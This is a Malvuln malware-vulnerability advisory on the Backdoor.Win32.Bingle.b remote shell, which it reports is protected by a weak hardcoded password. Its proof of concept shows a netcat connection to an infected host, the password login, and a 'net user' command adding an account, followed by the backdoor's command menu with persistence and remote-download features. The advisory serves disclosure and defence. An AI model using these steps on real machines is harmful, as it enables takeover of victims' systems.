    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/eacaa12336f50f1c395663fba92a4d32.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Bingle.bVulnerability: Weak Hardcoded CredentialsDescription: The malware is packed using ASPack 2.11, listens on TCP port 22 and requires authentication. However, the password "let me in" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: BingleType: PE32MD5: eacaa12336f50f1c395663fba92a4d32Vuln ID: MVID-2022-0643 Disclosure: 09/24/2022004029A0                 call    sub_4010E0004029A5                 add     esp, 0Ch004029A8                 cmp     eax, ebp004029AA                 jge     short loc_4029CC004029AC                 mov     edi, [esp+eax*4+230h+var_21C]004029B0                 mov     ecx, ebx004029B2                 xor     eax, eax004029B4                 repne scasb004029B6                 not     ecx004029B8                 sub     edi, ecx004029BA                 mov     edx, ecx004029BC                 mov     esi, edi004029BE                 mov     edi, offset aLetMeIn ; "let me in"Exploit/PoC:C:\>nc64.exe x.x.x.x 22let me in Nt Shell 1.0 beta by bingle@email.com.cn        Indicator '#' is NTShell Server output.        Type ?help for support commands beyond cmd;        ?use at command line for support parameters.        Use 'net helpmsg xxx' to see detail message of Error Code.Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\Victim\Desktop>whoamiwhoamidesktop-2c3iqho\victimC:\Users\Victim\Desktop>net user hyp3rlinx 1313 /addnet user hyp3rlinx 1313 /addThe command completed successfully.C:\Users\Victim\Desktop>?help#?autorun [name file "args"] --- add the [file] to autorun when reboot,                 [file] default is ntshell.exe#?canceldata            --- abort the previous file transfer command#?chdir <dir>           --- change the server current dir to <dir>,                 can be UNC(share) name#?get <file> [port]     --- GET <file> from server, server use [port] to tranfer#?help                  --- show this HELP#?httpget <url> <file>  --- get the 'file' from 'url',                eg:httpget http://192.168.0.1 /hackdir/hackprog.exe#?pskill PID            --- Kill the Process with PID#?pslist                --- List the all process in system#?put <file> [port]     --- PUT <file> to server, server use [port] to tranfer#?quit                  --- QUIT the telnetd program#?restart [<user> [pass]]       --- restart the shell as [user] in stead of                IUSR_computer if [user] specified, no need to reconnect#?sysinfor              --- Get the System os informationDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#windows